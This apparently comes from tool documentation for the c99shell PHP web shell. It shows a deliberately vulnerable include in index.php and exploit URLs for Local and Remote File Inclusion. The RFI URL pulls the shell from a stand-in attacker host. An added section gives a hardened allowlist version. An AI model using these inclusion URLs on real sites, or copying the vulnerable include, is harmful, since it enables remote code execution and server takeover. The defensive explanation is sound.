Description
c99shell is a single-file PHP script that can be called:
- locally via a Local File Inclusion (LFI) attack, if the file has been copied onto a compromised machine
- remotely via a Remote File Inclusion (RFI) attack, if the web application is vulnerable to such an attack.
Usage
Local File Inclusion (LFI)
Suppose there is a vulnerable web site that contains the following code (index.php):
<?php
if(isset($_GET["page"])) {
    require_once($_GET["page"]);
}
...
?>
You can exploit the Local File Inclusion (LFI) vulnerability by calling c99shell this way:
http://www.somevulnerablesite/index.php?page=c99.txt
Remote File Inclusion (RFI)
Suppose there is a vulnerable web site that contains the following code (index.php):
<?php
if(isset($_GET["page"])) {
    require_once($_GET["page"]);
}
...
?>
You can exploit the Remote File Inclusion (RFI) vulnerability by calling c99shell this way:
http://www.somevulnerablesite/index.php?page=http://www.hackerssite/phpshells/c99.txt
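Both the LFI and the RFI case come from passing $_GET["page"] straight to require_once. The hardened counterpart of that index.php snippet, as an added example that is not part of the original post, maps the parameter to an allowlist instead. The pages/ directory and the page names home, about and contact are assumptions made for illustration.

```php
<?php
// Added example: hardened replacement for the vulnerable include in index.php.
// Assumption: page templates live in ./pages/ and are named home, about, contact.
declare(strict_types=1);

const PAGES_DIR = __DIR__ . '/pages';
const ALLOWED_PAGES = [
    'home'    => 'home.php',
    'about'   => 'about.php',
    'contact' => 'contact.php',
];

/**
 * Map the user-supplied page key to a file on disk.
 * Returns null for anything that is not in the allowlist, so values such as
 * "c99.txt", "../../etc/passwd" or "http://host/x.txt" never reach require_once.
 */
function resolve_page($key): ?string
{
    // Arrays (?page[]=x) and other non-strings are rejected outright.
    if (!is_string($key) || !array_key_exists($key, ALLOWED_PAGES)) {
        return null;
    }
    $base = realpath(PAGES_DIR);
    $path = realpath(PAGES_DIR . '/' . ALLOWED_PAGES[$key]);
    // Defence in depth: the resolved file must exist and stay inside PAGES_DIR,
    // even if an allowlisted name turns out to be a symlink pointing elsewhere.
    if ($base === false || $path === false
        || strncmp($path, $base . DIRECTORY_SEPARATOR, strlen($base) + 1) !== 0) {
        return null;
    }
    return $path;
}

$page = resolve_page($_GET['page'] ?? 'home');
if ($page === null) {
    http_response_code(404);
    // json_encode escapes control characters, so the value cannot forge log lines.
    error_log('rejected page parameter: '
        . json_encode($_GET['page'] ?? null, JSON_INVALID_UTF8_SUBSTITUTE));
    exit('Page not found');
}
require_once $page;
```

Independently of the code, allow_url_include = Off in php.ini (the default) stops require_once from fetching http:// URLs, which blocks the RFI variant but not the LFI one.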